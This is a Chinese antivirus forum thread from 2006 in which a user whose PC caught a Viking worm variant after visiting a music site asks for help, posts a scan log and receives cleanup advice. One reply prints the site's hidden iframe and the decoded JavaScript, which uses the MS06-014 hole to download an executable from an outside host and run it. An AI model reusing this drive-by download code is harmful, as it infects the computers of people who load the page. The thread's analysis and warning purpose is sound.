瑞星卡卡安全论坛

今天上了一个下DJ的网站，但是很不幸，机器中毒了~

而且防火墙还自动关闭了，自动升级到最后的时候提示用户自动终止程序(监控中心可以更新)~~

机器里所有的程序都变成白框了（程序删除以后运行程序的那个样子）

用卡卡上网助手的查杀恶意及流氓软件找到好几个广告~~其中有木马~~

CPU使用率经常100%（cmd.exe logo1_.exe这样的程序，删了以后机器速度能快点，不过运行程序以后就又出来了~）

本人实在是个菜鸟，请问应该怎么解决啊？谢谢~~谢谢~~~~

有没有明白人啊？不知道有没有用，发给你们看一下

Logfile of Kaka v2. 0. 2. 5 Scan Module v1. 0. 3. 6
Scan saved at 18:24:51, on 2006-12-14
Platform: Microsoft Windows XP Professional Service Pack 2 (Build 2600)
MSIE: Internet Explorer v6.00 SP2; (6.00.2900.2180 (xpsp_sp2_rtm.040803-2158))


R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page=C:\WINDOWS\system32\blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page=%SystemRoot%\system32\blank.htm
O1 - Hosts: 127.0.0.1      localhost
O2 - BHO:  - {A9930D97-9CF0-42A0-A10D-4F28836579D5} - D:\PROGRA~1\KuGoo3\KUGOO3~1.OCX
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [CnxDslTaskBar] "C:\Program Files\ZTE\ZXDSL852\CnxDslTb.exe"
O4 - HKLM\..\Run: [RfwMain] "d:\Program Files\Rising\Rfw\rfwmain.exe" -Startup
O4 - HKLM\..\Run: [RavTask] "d:\Program Files\Rising\Rav\RavTask.exe" -system
O4 - HKLM\..\Run: [load] C:\WINDOWS\uninstall\rundl132.exe
O4 - HKLM\..\Run: [runeip] C:\Program Files\Rising\AntiSpyware\runiep.exe
O4 - HKLM\..\RunOnce: [KKDelay] C:\Program Files\Rising\AntiSpyware\RunOnce.exe
O4 - Startup: desktop.ini =
O4 - Global Startup: desktop.ini =
O8 - Extra context menu item: &使用迅雷下载 - d:\Thunder\Program\GetUrl.htm
O8 - Extra context menu item: &使用迅雷下载全部链接 - d:\Thunder\Program\GetAllUrl.htm
O8 - Extra context menu item: 上传到QQ网络硬盘 - D:\QQ\AddToNetDisk.htm
O8 - Extra context menu item: 使用KuGoo3下载(&K) - D:\Program Files\KuGoo3\KuGoo3DownX.htm
O8 - Extra context menu item: 添加到QQ自定义面板 - D:\QQ\AddPanel.htm
O8 - Extra context menu item: 添加到QQ表情 - D:\QQ\AddEmotion.htm
O8 - Extra context menu item: 用QQ彩信发送该图片 - D:\QQ\SendMMS.htm
O9 - Extra Button: 启动迅雷5 - {09BA8F6D-CB54-424B-839C-C2A6C8E6B436} - d:\Thunder\Thunder.exe
O9 - Extra 'Tools' menuitem: 启动迅雷5 - {09BA8F6D-CB54-424B-839C-C2A6C8E6B436} - d:\Thunder\Thunder.exe
O9 - Extra Button: QQ - {c95fe080-8f5d-11d2-a20b-00aa003c157b} - D:\QQ\QQ.EXE
O9 - Extra 'Tools' menuitem: 腾讯QQ - {c95fe080-8f5d-11d2-a20b-00aa003c157b} - D:\QQ\QQ.EXE
O14 - IERESET.INF: START_PAGE_URL=http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
O17 - HKLM\System\CCS\Services\Tcpip\..\{B0E4ADA0-237C-4564-977C-5F475188DB7F}: NameServer = 202.96.64.68 202.96.69.38
O18 - Protocol: about - {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: cdl - {3dd53d40-7b8b-11D0-b013-00aa0059ce02} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: dvd - {12D51199-0DB5-46FE-A120-47A3D7D937CC} - C:\WINDOWS\system32\msvidctl.dll
O18 - Protocol: file - {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ftp - {79eac9e3-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: gopher - {79eac9e4-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: http - {79eac9e2-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: https - {79eac9e5-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ipp - (no CLSID) - (no file)
O18 - Protocol: its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll
O18 - Protocol: javascript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: local - {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: mailto - {3050f3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: mhtml - {05300401-BCBC-11d0-85E3-00C04FD85AB4} - C:\WINDOWS\system32\inetcomm.dll
O18 - Protocol: mk - {79eac9e6-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ms-its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll
O18 - Protocol: msdaipp - (no CLSID) - (no file)
O18 - Protocol: res - {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: sysimage - {76E67A63-06E9-11D2-A840-006008059382} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: tv - {CBD30858-AF45-11D2-B6D6-00C04FBBDE6E} - C:\WINDOWS\system32\msvidctl.dll
O18 - Protocol: vbscript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: wia - {13F3EA8B-91D7-4F0A-AD76-D2853AC8BECE} - C:\WINDOWS\system32\wiascr.dll
O23 - Service: Human Interface Device Access (HidServ) -  - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: Rising Proxy  Service (RfwProxySrv) - Beijing Rising Technology Co., Ltd. - d:\program files\rising\rfw\rfwproxy.exe
O23 - Service: Rising Personal Firewall Service (RfwService) - Beijing Rising Technology Co., Ltd. - D:\Program Files\Rising\Rfw\rfwsrv.exe
O23 - Service: Rising Process Communication Center (RsCCenter) - Beijing Rising Technology Co., Ltd. - "d:\Program Files\Rising\Rav\CCenter.exe"
O23 - Service: RsRavMon Service (RsRavMon) - Beijing Rising Technology Co., Ltd. - "d:\Program Files\Rising\Rav\Ravmond.exe"
O23 - Service: User Privilege Service (usprserv) - Microsoft Corporation - C:\WINDOWS\system32\svchost.exe -k netsvcs

cmd.exe logo1_.exe这样的程序
中了大奖了
置顶的帖子里有详细的解决方法

http://forum.ikaka.com/topic.asp?board=28&artid=8231301
这是最新的变种

晕，告诉你们那个网站的网址吧，希望亡羊补牢，其他的人不要再受伤害~~~

www.97dj.com

你发出来就一定会有人去看的

不要看啊，垃圾网站，绝对的垃圾网站，我可以象毛主席发誓~

我还是看看这么解决吧，不行的话我就只能全格了~~

郁闷啊~~~好多好多东西啊，怎么办啊~~~

下载威金专杀，瑞星网站，江民网站，我的e盘也有一个，版本有点低，不知能不能用，试试吧mizuki.ys168.com

先谢谢你们，我看看下专杀行不行吧，如果不行的话我真的要重新分区了~~祝我好运吧，努力！！

楼主给的网页，进入后跳转到default.htm，下方有：
<iframe src="http://mail.down988.cn/bill/index.htm" width="0" height="0" frameborder="0"></iframe>

此index.htm的内容：
<script language=javascript src=http://mail.down988.cn/bill/test.js></script>
<script language="javascript" src="http://ww1.tongji123.com/t1.aspx?id=11907117"></script>
下面那段是流量统计，而上面的test.js，是经加密的代码，还原后如下：

function gn(n) { var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; } try { dl='http://mail.down988.cn/get/avpi.exe'; var df=document.createElement("object"); df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); var S=df.CreateObject("Adodb.Stream",""); S.type=1; x.open("GET", dl,0); x.send(); fname1=gn(10000); var F=df.CreateObject("Scripting.FileSystemObject",""); var tmp=F.GetSpecialFolder(0); fname1= F.BuildPath(tmp,fname1); S.Open();S.Write(x.responseBody); S.SaveToFile(fname1,2); S.Close(); var Q=df.CreateObject("Shell.Application",""); exp1=F.BuildPath(tmp+'\\system32','cmd.exe'); Q.ShellExecute(exp1,' /c '+fname1,"","open",0); } catch(i) { i=1; }

利用MS06-014漏洞，下载http://mail.down988.cn/get/avpi.exe到本机
此avpi.exe，viking变种，瑞星最新版本尚不能查杀。正在验证置顶帖提供的专杀的最新病毒库是否能查杀。

崩溃中~~刚才用卡卡上网助手上提供的专杀工具杀了一下，一个毒都没有找到，不过可以肯定的是文件数一定不对，正常应该是将近10W个文件，但是刚才之有5W多，杀毒的过程中监控中心杀了几个（绝对不超过10个）。。。。杀完以后c盘的根目录下还是有desktop.ini这个文件。。。。。其他.EXE的图标还是白框~~~~

是不是可以说我的杀毒失败了？？

附件: 80406220061214194835.JPG

不要沉了，帮帮我~~

不行的话今天晚上通宵做机器~~

我顶到10点，不行的话就重做~~大家体谅我一下

刚将样本交给mopery，农夫的威金专杀病毒库已更新。
http://mopery.hits.io/viking.zip
下载此压缩包，把整个解压后双击运行VIKING杀虫剂.com，点“在线升级”，如果防火墙提示访问网络则点允许，升级完成之后病毒库应为175个以上，再点“全盘扫描”

这些无法访问是什么意思？不是病毒？还是成功或失败了？



附件: 80406220061214212913.JPG

你有没有在线升级

升级了，而且还点了好几次，每次都可以升级，没有提示已经是最新版本~~上面的日期也是今天的啊~~

C:\WINDOWS\logo1_.exe看看有没有这个,没有就好了

引用:

【轩辕小聪的贴子】 此avpi.exe，viking变种，瑞星最新版本尚不能查杀。正在验证置顶帖提供的专杀的最新病毒库是否能查杀。 ………………

这个威金还算手下留情的。只删除ghost.exe和ghostExp.exe，没动GHO文件。

附件: 15584720061214214644.jpg

我想哭~~


附件: 80406220061214215502.JPG

..

附件: 80406220061214215644.JPG

不过音乐确实不错，怪不得楼主会中招

我要是知道能中招，多好的音乐我也不会听的~~

还有。。。。。不是说不让你们进的吗？不怕中招？？


附件: 80406220061214220247.JPG

引用:

【就是个菜鸟的贴子】我要是知道能中招，多好的音乐我也不会听的~~ 还有。。。。。不是说不让你们进的吗？不怕中招？？ ………………

你的IE浏览器招的祸。
用OPERA光顾那个网站——没任何问题。
那个威金，我是用小聪给的url下载来的。

我不用IE啊，我用的遨游~~

给个解决的方法吧，实在不行的话我今天晚上真的要通宵了~~

大哭~~~真的弄不了了吗？